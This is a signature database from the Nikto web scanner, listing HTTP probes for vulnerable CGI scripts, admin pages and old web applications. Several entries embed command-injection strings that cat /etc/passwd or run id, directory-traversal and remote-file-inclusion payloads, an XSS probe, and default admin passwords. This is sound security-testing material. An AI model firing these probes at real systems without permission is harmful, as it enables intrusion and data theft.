####################################################################### # File Source: https://cirt.net # (c) 2001 Chris Sullo, All Rights Reserved. # This file may only be distributed and used with the full Nikto package. # This file may not be used with any software product without written permission from # Chris Sullo (csullo@gmail.com) # # Note: # By submitting updates to this file you are transferring any and all copyright # interest in the data to Chris Sullo so it can modified, incorporated into this product # relicensed or reused. ####################################################################### # Notes: # # Tuning options (field 3): # 0 - File Upload # 1 - Interesting File / Seen in logs # 2 - Misconfiguration / Default File # 3 - Information Disclosure # 4 - Injection (XSS/Script/HTML) # 5 - Remote File Retrieval - Inside Web Root # 6 - Denial of Service # 7 - Remote File Retrieval - Server Wide # 8 - Command Execution / Remote Shell # 9 - SQL Injection # a - Authentication Bypass # b - Software Identification # c - Remote source inclusion # d - WebService # e - Administrative Console # f - XML Injection # # Field order: # Test-ID, References, Tuning Type, URI, HTTP Method, Match 1, Match 1 Or, Match 1 And, Fail 1, Fail 2, Summary, HTTP Data, Headers # ####################################################################### "000001","","b","/TiVoConnect?Command=QueryServer","GET","Calypso Server","","","","","The Tivo Calypso server is running. This page will display the version and platform it is running on. Other URLs may allow download of media.","","" "000002","","b","/TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes","GET","TiVoContainer","","","","","TiVo client service is running and may allow download of mp3 or jpg files.","","" "000003","","1234576890ab","@CGIDIRScart32.exe","GET","200","","","","","request cart32.exe/cart32clientlist","","" "000004","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSclassified.cgi","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000005","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSdownload.cgi","GET","200","","","","","Check info in Phrack 55 by RFP","","" "000006","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSflexform.cgi","GET","200","","","","","Check Phrack 55 for info by RFP; allows to append info to writable files.","","" "000007","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSflexform","GET","200","","","","","Check Phrack 55 for info by RFP; allows to append info to writable files.","","" "000008","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSlwgate.cgi","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000009","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSLWGate.cgi","GET","200","","","","","Check Phrack 55 for info by RFP.","","" "000010","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSlwgate","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000011","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSLWGate","GET","200","","","","","Check Phrack 55 for info by RFP","","" "000012","http://phrack.org/issues/55/7.html#article","1234576890ab","@CGIDIRSperlshop.cgi","GET","200","","","","","v3.1 by ARPAnet.com; check info in Phrack 55 by RFP","","" "000013","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","1234576890ab","/cfappman/index.cfm","GET","200","","not found","","","sSsceptible to ODBC/pipe-style exploit.","","" "000014","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","1234576890ab","/cfdocs/examples/cvbeans/beaninfo.cfm","GET","200","","not found","","","Susceptible to ODBC exploit.","","" "000015","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","1234576890ab","/cfdocs/examples/parks/detail.cfm","GET","200","","not found","","","Susceptible to ODBC exploit.","","" "000016","","1234576890ab","/kboard/","GET","200","","","","","KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php","","" "000017","","1234576890ab","/lists/admin/","GET","200","","","","","PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist","","" "000018","https://seclists.org/bugtraq/2002/Jul/262","7a","/splashAdmin.php","GET","200","","","","","Cobalt Qube 3 admin is running. This may have multiple security problems which could not be tested remotely.","","" "000019","","1234576890ab","/ssdefs/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","","" "000020","","1234576890ab","/sshome/","GET","200","","","","","Siteseed pre 1.4.2 has 'major' security problems.","","" "000021","","1234576890ab","/tiki/","GET","200","","","","","Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin","","" "000022","","1234576890ab","/tiki/tiki-install.php","GET","200","","","","","Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin","","" "000023","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","1234576890ab","/scripts/samples/details.idc","GET","200","","","","","NT ODBC Remote Compromise.","","" "000024","CVE-2000-0709","6","/_vti_bin/shtml.exe","GET","200","","","","","Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.","","" "000025","","1","@CGIDIRShandler.cgi","GET","200","","","","","Variation of Irix Handler? Has been seen from other CGI scanners.","","" "000026","","28","@CGIDIRSfinger","GET","200","","","","","finger other users, may be other commands?","","" "000027","","28","@CGIDIRSfinger.pl","GET","200","","","","","finger other users, may be other commands?","","" "000028","","3","@CGIDIRSformmail.cgi","GET","Matt\sWright","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","","" "000030","","3","@CGIDIRSformmail","GET","Matt\sWright","","","","","The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.","","" "000031","","3","@CGIDIRSget32.exe","GET","200","","","","","This can allow attackers to execute arbitrary commands remotely.","","" "000032","CVE-2002-0324 http://www.attrition.org/~jericho/works/security/greymatter.html","3","@CGIDIRSgm-authors.cgi","GET","200","","","","","GreyMatter 'password' file, that controls who can post. This contains login and password information and is installed mode 666 by default.","","" "000033","","3","@CGIDIRSguestbook/passwd","GET","200","","","","","GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.","","" "000034","https://www.php.net/manual/en/function.phpinfo.php","3","@CGIDIRShorde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000035","","3","@CGIDIRSphoto/protected/manage.cgi","GET","200","","","","","My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.","","" "000036","","3","@CGIDIRSwrap.cgi","GET","200","","","","","Allows viewing of directories.","","" "000037","","3","/./","GET","include\(\"","","","","","Appending '/./' to a directory may reveal PHP source code.","","" "000038","CVE-2001-1013","23","/~root/","GET","200","","","rtsptext","","Allowed to browse root's home directory.","","" "000039","","3","/cgi-bin/wrap","GET","200","","","","","Allows viewing of directories.","","" "000040","","3","/forums/@ADMINconfig.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","","" "000041","","3","/forums/config.php","GET","200","","","","","PHP Config file may contain database IDs and passwords.","","" "000042","","3","/ganglia/","GET","Cluster","","","","","Ganglia Cluster reports reveal detailed information.","","" "000043","","3","/guestbook/guestbookdat","GET","200","","","","","PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.","","" "000044","","3","/guestbook/pwd","GET","200","","","","","PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.","","" "000045","","3","/help/","GET","200","","","","","Help directory should not be accessible","","" "000046","https://vulners.com/exploitdb/EDB-ID:23027","3","/hola/admin/cms/htmltags.php?datei=./sec/data.php","GET","200","","","","","hola-cms-1.2.9-10 may reveal the administrator ID and password.","","" "000047","","3","/horde/imp/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000048","https://www.php.net/manual/en/function.phpinfo.php","3","/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000049","https://www.php.net/manual/en/function.phpinfo.php","3","/imp/horde/test.php?mode=phpinfo","GET","PHP Version","","","","","Horde allows phpinfo() to be run, which gives detailed system information.","","" "000050","","3","/imp/horde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000051","","3","/index.html.bak","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","The remote server (perhaps Web602) shows directory indexes if .bak is appended to the request.","","" "000052","","3","/index.html~","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","The remote server (perhaps Web602) shows directory indexes if a ~ is appended to the request.","","" "000053","CVE-2001-1168","7","/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc","GET","resolv\.conf","","","","","phpMyExplorer allows attackers to read directories on the server.","","" "000054","CVE-2002-0614","23","/global.inc","GET","200","","","","","PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php","","" "000055","","3b","@CGIDIRSformmail.pl","GET","Matt\sWright","","","","","Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.","","" "000056","","3b","@CGIDIRShorde/test.php","GET","Horde Versions","","","","","Horde script reveals detailed system/Horde information.","","" "000057","CVE-2003-1253","4","/inc/common.load.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","","" "000058","CVE-2003-1253","4","/inc/config.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","","" "000059","CVE-2003-1253","4","/inc/dbase.php","GET","200","","","","","Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.","","" "000060","","6","@CGIDIRSvisadmin.exe","GET","200","","","","","This CGI allows an attacker to crash the web server. Remove it from the CGI directory.","","" "000061","","7","@CGIDIRShtml2chtml.cgi","GET","200","","","","","Html2Wml < 0.4.8 access local files via CGI, and more","","" "000062","","7","@CGIDIRShtml2wml.cgi","GET","200","","","","","Html2Wml < 0.4.8 access local files via CGI, and more","","" "000063","CVE-2000-0590","7","@CGIDIRSpollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00","GET","root:","","","","","Poll_It_SSI_v2.0.cgi allows attackers to retrieve arbitrary files.","","" "000064","","8","@CGIDIRSecho.bat?&dir+c:\\","GET","200","","","","","This batch file may allow attackers to execute remote commands.","","" "000065","","8","@CGIDIRSexcite;IFS=\"$\";/bin/cat%20/etc/passwd","GET","root:","","200","","","Excite software is vulnerable to command execution.","","" "000066","CVE-2000-0187","8","@CGIDIRSezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|","GET","root:","","","","","EZShopper loadpage CGI command execution","","" "000067","","8","@CGIDIRSguestbook.cgi","GET","200","","","","","May allow attackers to execute commands as the web daemon.","","" "000068","","8","@CGIDIRSguestbook.pl","GET","200","","","","","May allow attackers to execute commands as the web daemon.","","" "000069","","8","@CGIDIRSss","GET","200","","","","","Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.","","" "000070","CVE-2005-0429","8","/forumdisplay.php?GLOBALS\[\]=1&f=2&comma=\".system\('id'\)\.\"","GET","uid=0","","","","","VBulletin forumdisplay.php remote command execution.","","" "000071","https://vulners.com/osvdb/OSVDB:2889","8","/guestbook/guestbook.html","GET","Jason Maloney","","","","","Jason Maloney CGI Guestbook 3.0 allows remote code execution. Bugtraq 2003-12-01","","" "000072","","8","/html/cgi-bin/cgicso?query=AAA","GET","400 Required field missing: fingerhost","","","","","This CGI allows attackers to execute remote commands.","","" "000073","https://vulners.com/osvdb/OSVDB:2703","9","/geeklog/users.php","GET","200","","","","","Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.","","" "000074","CVE-2002-1560","a","/gb/index.php?login=true","GET","200","","","","","gBook may allow admin login by setting the value 'login' equal to 'true'.","","" "000075","","a","/guestbook/admin.php","GET","200","","","","","Guestbook admin page available without authentication.","","" "000076","","b","@CGIDIRSgH.cgi","GET","200","","","","","Web backdoor by gH","","" "000077","CVE-2002-0324 http://www.attrition.org/~jericho/works/security/greymatter.html","b","@CGIDIRSgm-cplog.cgi","GET","200","","","","","GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site.","","" "000078","","b","/getaccess","GET","200","","","","","This may be an indication that the server is running getAccess for SSO","","" "000079","https://www.darknet.org.uk/2007/01/spike-proxy-application-level-security-assessment/","b","/help.html","GET","little interface into SPIKE","","","","","SPIKE Proxy may be running; try using it as a proxy.","","" "000080","CVE-2002-0324 http://www.attrition.org/~jericho/works/security/greymatter.html","3b","@CGIDIRSgm.cgi","GET","200","","","","","GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location.","","" "000081","CVE-2002-0451,https://securiteam.com/unixfocus/5PP0F1P6KS/","c","/filemanager/filemanager_forms.php?lib_path=@RFIURL","GET","PHP Version","","","","","Some versions of PHProjekt allow remote file inclusions.","","" "000082","","1e","@CGIDIRSAT-admin.cgi","GET","200","","","","","Admin interface.","","" "000083","CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html","23","@CGIDIRSauth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely.","","" "000084","","23","@CGIDIRSawstats.pl","GET","Traffic","","","","","AWStats logfile analyzer.","","" "000085","","23","@CGIDIRSawstats/awstats.pl","GET","Traffic","","","","","Free realtime logfile analyzer for advanced web statistics. Should be protected.","","" "000086","","23b","@CGIDIRSblog/mt.cfg","GET","configuration file","","","","","Movable Type configuration file found. Should not be available remotely.","","" "000087","CVE-2003-1517","3","@CGIDIRScart.pl?db='","GET","c:\\\\","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","","" "000088","CVE-2003-1517","3","@CGIDIRScart.pl?db='","GET","d:\\\\","","","","","Dansie Shopping Cart reveals the full path to the CGI directory.","","" "000089","CVE-2000-1191","3","@CGIDIRShtsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=","GET","ht:\\\/\\\/Dig","","","","","The ht://Dig install may reveal the path to its configuration files, revealing sensitive information about the server.","","" "000090","","3","@CGIDIRSmt-static/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","","" "000091","","3","@CGIDIRSmt/mt-check.cgi","GET","200","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","","" "000092","","3","/cfdocs/expeval/openfile.cfm","GET","200","","","","","Can use to expose the system/server path.","","" "000093","","3","/index.php/123","GET","Premature end of script headers","","","","","Some versions of PHP reveal PHP's physical path on the server by appending /123 to the PHP file name.","","" "000094","https://vulners.com/osvdb/OSVDB:7510","3","/mambo/index.php?Itemid=JUNK(5)","GET","exceeded in \/","","","","","Mambo Site Server 4.0.11 reveals the web server path.","","" "000095","CVE-2002-1723","3","/profile.php?u=JUNK(8)","GET","Warning:","","","","","Powerboards is vulnerable to path disclosure.","","" "000096","CVE-2002-2158","3","/ticket.php?id=99999","GET","expects first argument","","","","","ZenTrack versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors.","","" "000097","CVE-2003-0400","3","/vgn/login/1,501,,00.html?cookieName=x--\>","GET","value=\"x--","","","","","Vignette server may leak memory with an invalid request. Upgrade to the latest version.","","" "000098","","3","/a%5c.aspx","GET","Invalid file name for monitoring:","","","","","Older Microsoft .NET installations allow full path disclosure.","","" "000099","","7","@CGIDIRSbanner.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","","" "000100","","7","@CGIDIRSbannereditor.cgi","GET","200","","","","","This CGI may allow attackers to read any file on the system.","","" "000101","CVE-2001-1114","7","@CGIDIRSbook.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000102","","7e","/admin/browse.asp?FilePath=c:\&Opt=2&level=0","GET","winnt","","","","","Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely.","","" "000103","","8","@CGIDIRSarchitext_query.pl","GET","200","","","","","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.","","" "000104","CVE-2000-0287","8","@CGIDIRSbizdb1-search.cgi","GET","200","","","","","This CGI may allow attackers to execute commands remotely.","","" "000105","","b","@CGIDIRSblog/","GET","200","","","","","A blog was found. May contain security problems in CGIs, weak passwords, and more.","","" "000106","https://web.archive.org/web/20040910030506/http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html","b","/tsweb/","GET","200","","","","","Microsoft TSAC found.","","" "000107","","1b","@CGIDIRSblog/mt-load.cgi","GET","200","","","","","Movable Type weblog installation CGI found. May be able to reconfigure or reload.","","" "000108","CVE-2002-1435","c","@CGIDIRSatk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL","GET","PHP Version","","","","","Achievo can be made to include PHP files from another domain. Upgrade to a new version.","","" "000109","","23e","/vgn/performance/TMT","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000110","","23e","/vgn/performance/TMT/Report","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000111","","23e","/vgn/performance/TMT/Report/XML","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000112","","23e","/vgn/performance/TMT/reset","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000113","","23e","/vgn/ppstats","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000114","","23e","/vgn/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000115","","23e","/vgn/record/previewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000116","","23e","/vgn/stylepreviewer","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000117","","23e","/vgn/vr/Deleting","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000118","","23e","/vgn/vr/Editing","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000119","","23e","/vgn/vr/Saving","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000120","","23e","/vgn/vr/Select","GET","200","","","","","Vignette CMS admin/maintenance script available.","","" "000121","MS02-028","23","/scripts/iisadmin/bdir.htr","GET","200","","","","","This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\<dir>.","","" "000122","","2a","/scripts/iisadmin/ism.dll","GET","200","","","","","Allows you to mount a brute force attack on passwords","","" "000123","","2a","/scripts/tools/ctss.idc","GET","200","","","","","This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.","","" "000124","","3","/bigconf.cgi","GET","200","","","","","BigIP Configuration CGI","","" "000125","","3","/billing/billing.apw","GET","PASS BOX CAPTION:","","","","","CoffeeCup password wizard allows password files to be read remotely.","","" "000126","","3","/blah_badfile.shtml","GET","200","","","","","Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->","" "000127","","3","/blah-whatever-badfile.jsp","GET","Script \/","","","","","The web server is configured to respond with the web server path when requesting a non-existent .jsp file.","","" "000128","CVE-2003-0401","3","/vgn/style","GET","200","","","","","Vignette server may reveal system information through this file.","","" "000129","","3","/scripts/no-such-file.pl","GET","perl script","","","","","Using perl.exe allows attackers to view host info. Use perlis.dll instead.","","" "000130","CVE-2002-1769","3","/SiteServer/Admin/commerce/foundation/domain.asp","GET","200","","","","","Displays known domains of which that server is involved.","","" "000131","CVE-2002-1769","3","/SiteServer/Admin/commerce/foundation/driver.asp","GET","200","","","","","Displays a list of installed ODBC drivers.","","" "000132","CVE-2002-1769","3","/SiteServer/Admin/commerce/foundation/DSN.asp","GET","200","","","","","Displays all DSNs configured for selected ODBC drivers.","","" "000133","CVE-2002-1769","3","/SiteServer/admin/findvserver.asp","GET","200","","","","","Gives a list of installed Site Server components.","","" "000134","","3","/SiteServer/Admin/knowledge/dsmgr/default.asp","GET","200","","","","","Used to view current search catalog configurations","","" "000135","CVE-2001-0987","4","@CGIDIRScgiwrap/%3Cfont%20color=red%3E","GET","<font color=red>","","","","","cgiwrap allows HTML and possibly XSS injection.","","" "000136","http://moinmo.in/MoinMoinDownload","4","@CGIDIRSmoin.cgi?test","GET","200","","","","","MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vulnerability","","" "000138","","4","/basilix/mbox-list.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page","","" "000139","","4","/basilix/message-read.php3","GET","200","","","","","BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page","","" "000140","","4","/clusterframe.jsp","GET","200","","","","","Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.","","" "000141","","4","/IlohaMail/blank.html","GET","200","","","","","IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.","","" "000142","","8","/bb-dnbd/faxsurvey","GET","200","","","","","This may allow arbitrary command execution.","","" "000143","","8","/cartcart.cgi","GET","200","","","","","If this is Dansie Shopping Cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands.","","" "000144","CVE-2001-0614","8","/scripts/Carello/Carello.dll","GET","200","","","","","Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.","","" "000145","","a","/scripts/tools/dsnform.exe","GET","200","","","","","Allows creation of ODBC Data Source","","" "000146","","a","/scripts/tools/dsnform","GET","200","","","","","Allows creation of ODBC Data Source","","" "000147","https://securitytracker.com/id/1003420","a","/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp","GET","200","","","","","Microsoft Site Server script used to create, modify, and potentially delete LDAP users and groups.","","" "000148","https://securitytracker.com/id/1003420","a","/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp","GET","200","","","","","Microsoft Site Server used to create, modify, and potentially delete LDAP users and groups.","","" "000149","","b","/prd.i/pgen/","GET","200","","","","","Has MS Merchant Server 1.0","","" "000150","","b","/readme.eml","GET","200","","","","","Remote server may be infected with the Nimda virus.","","" "000151","","b","/scripts/httpodbc.dll","GET","200","","","","","Possible IIS backdoor found.","","" "000152","","b","/scripts/proxy/w3proxy.dll","GET","502","","","","","MSProxy v1.0 installed","","" "000153","","b","/scripts/root.exe?/c+dir+c:\+/OG","GET","Directory of c","","","","","This machine is infected with Code Red, or has Code Red leftovers.","","" "000155","","1","/siteseed/","GET","200","","","","","Siteseed pre 1.4.2 have 'major' security problems.","","" "000156","MS01-033","2","/scripts/samples/search/author.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed.","","" "000157","MS01-033","2","/scripts/samples/search/filesize.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed.","","" "000158","MS01-033","2","/scripts/samples/search/filetime.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed.","","" "000159","MS01-033","2","/scripts/samples/search/queryhit.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed.","","" "000160","MS01-033","2","/scripts/samples/search/simple.idq","GET","The template file can not be found in the location specified","","","","","This is a default IIS script/file that should be removed.","","" "000161","","23","/pccsmysqladm/incs/dbconnect.inc","GET","200","","","","","This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.","","" "000162","","23e","/iisadmin/","GET","200","","","is restricted to Localhost","","Access to /iisadmin should be restricted to localhost or allowed hosts only.","","" "000163","","3","/password.inc","GET","globalpw","","","","","GTCatalog 0.9 admin password was retrieved remotely.","","" "000164","http://zodi.com/cgi-bin/shopper.cgi?display=intro&template=Intro/commerce.html","3","/PDG_Cart/order.log","GET","200","","","","","PDG Commerce log found.","","" "000165","","3","/web-console/ServerInfo.jsp%00","GET","<\%=","","","","","JBoss 3.2.1 with jetty seems to disclose source code.","","" "000166","","3","/global.asa","GET","RUNAT","","","","","The global.asa file was retrieved, which may contain sensitive information. Map the .asa extension to the proper dll.","","" "000167","","23","/exchange/lib/AMPROPS.INC","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000168","","23","/exchange/lib/DELETE.INC","GET","deleting objects","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000169","","23","/exchange/lib/GETREND.INC","GET","GetRenderer functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000170","","23","/exchange/lib/GETWHEN.INC","GET","functions to construct","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000171","","23","/exchange/lib/JSATTACH.INC","GET","Attachment Javascript","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000172","","23","/exchange/lib/JSROOT.INC","GET","Javascript Functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000173","","23","/exchange/lib/JSUTIL.INC","GET","Common Javascript","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000174","","23","/exchange/lib/LANG.INC","GET","localized strings","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000175","","23","/exchange/lib/logon.inc","GET","Logon functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000176","","23","/exchange/lib/PAGEUTIL.INC","GET","functions that help","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000177","","23","/exchange/lib/PUBFLD.INC","GET","Anonymous Published","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000178","","23","/exchange/lib/RENDER.INC","GET","Rendering functions","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000179","","23","/exchange/lib/SESSION.INC","GET","Session Management","","","","","Outlook Web Access server allows source code to be viewed by requesting the file directly from /exchange/lib/","","" "000180","","5","/ows/restricted%2eshow","GET","200","","","","","OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.","","" "000181","http://www.westpoint.ltd.uk/advisories/wp-02-0002.txt","5","/WEB-INF./web.xml","GET","j2ee","","","","","Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others.","","" "000182","","7","/view_source.jsp","GET","200","License Exception","","","","Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable.","","" "000183","","8","/w-agora/","GET","200","","","","","w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.","","" "000184","CVE-2002-2320","a","/vider.php3","GET","200","","","","","MySimpleNews may allow deleting of news items without authentication.","","" "000185","","a","/exchange/root.asp?acs=anon","GET","\/exchange\/logonfrm\.asp","","","","","This allows anonymous access to portions of the OWA server.","","" "000186","https://web.archive.org/web/20030607054822/http://support.microsoft.com/support/exchange/content/whitepapers/owaguide.doc","a","/officescan/cgi/cgiChkMasterPwd.exe","GET","200","","","","","Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.","","" "000187","https://www.f-secure.com/v-descs/tanatos.shtml","b","/%NETHOOD%/","GET","Microsoft Windows Network","","","","","The machine may be infected with the Bugbear.B virus.","","" "000188","BID-4684","d","@CGIDIRSastrocam.cgi","GET","200","","","","","Astrocam 1.4.1 contained buffer overflow. Prior to 2.1.3 contained unspecified security bugs.","","" "000189","","de","@CGIDIRSbadmin.cgi","GET","200","","","","","BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.","","" "000190","CVE-2002-0098","de","@CGIDIRSboozt/admin/index.cgi?section=5&input=1","GET","200","","","","","Boozt CGI may have a buffer overflow. Upgrade to a version newer than 0.9.8alpha.","","" "000191","","de","@CGIDIRSezadmin.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","","" "000192","","d","@CGIDIRSezboard.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","","" "000193","","d","@CGIDIRSezman.cgi","GET","200","","","","","Some versions of this CGI are vulnerable to a buffer overflow.","","" "000194","CVE-2003-0762","d","@CGIDIRSfoxweb.dll","GET","200","","","","","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.","","" "000195","CVE-2003-0762","d","@CGIDIRSfoxweb.exe","GET","200","","","","","Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.","","" "000196","","d","@CGIDIRSmgrqcgi","GET","200","","","","","This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.","","" "000197","","d","@CGIDIRSwconsole.dll","GET","200","","","","","It may be possible to overflow this dll with 1024 bytes of data.","","" "000198","","d","@CGIDIRSwebplus.exe?about","GET","Product Information","","","","","Webplus may divulge product information, including version numbers. Version 4.X and below have a file read vulnerability. Versions prior to 4.6 build 561 and 5.0 build 554 have a buffer overflow.","","" "000199","MS00-094","d","/pbserver/pbserver.dll","GET","200","","","","","This may contain a buffer overflow.","","" "000200","","0","/administrator/gallery/uploadimage.php","GET","200","","","","","Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.","","" "000201","","0","/pafiledb/includes/team/file.php","GET","200","","","","","paFileDB 3.1 and below may allow file upload without authentication.","","" "000202","","0","/phpEventCalendar/file_upload.php","GET","200","","","","","phpEventCalendar 1.1 and prior are vulnerable to file upload bug.","","" "000203","","0","/servlet/com.unify.servletexec.UploadServlet","GET","200","Error Occurred","","","","This servlet allows attackers to upload files to the server.","","" "000204","","0","@CGIDIRSuploader.exe","GET","200","","","","","This CGI allows attackers to upload files to the server and then execute them.","","" "000205","","0","/scripts/cpshost.dll","GET","200","","","","","Posting acceptor possibly allows you to upload files","","" 